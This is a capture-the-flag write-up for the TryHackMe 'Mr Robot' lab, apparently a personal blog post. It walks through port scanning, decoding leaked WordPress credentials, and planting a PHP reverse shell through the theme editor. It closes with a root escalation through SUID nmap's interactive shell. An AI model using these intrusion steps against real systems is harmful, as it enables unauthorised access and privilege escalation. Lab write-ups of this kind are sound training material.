This page looks best with JavaScript enabled

TryHackMe: Mr Robot CTF

 ·  ☕ 2 min read

Enumeration

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.167.211 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.167.211
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 23:49 CEST
Nmap scan report for 10.10.167.211
Host is up (0.050s latency).

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds

Flag 1

Then examined the robots in port 80 and got the first flag together with a dictionary:

root@docker-desktop:~# curl 10.10.106.239/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

Flag 2

Then used that dictionary to make a directory bruteforce:

Dirsearch

Found user credentials in one of them:

root@docker-desktop:~/Documents/mrrobot# curl -s http://10.10.75.244/license | tail -n 1 | base64 -d
e****t:ER*****52

Used the credentials to log in Wordpress.

Then from the administration panel created a post, then used the theme editor to edit footer.php and add a php reverse shell.
Finally used curl to the post to make the reverse shell to be executed:

root@docker-desktop:~/Documents/mrrobot# curl http://10.10.75.244/2020/06/24/aaaa/

Flag 3

Then did some manual enumeration and found an interesting file near the next flag:

daemon@linux:/home/robot$ ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Searched for the hash in crackstation and used the password to connect as robot:

Dirsearch

Then with help of linpeas enumerated the system, and found that nmap has suid:

Dirsearch

To end up searched in gtfobins nmap and used it to scalate privileges:

robot@linux:/tmp$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover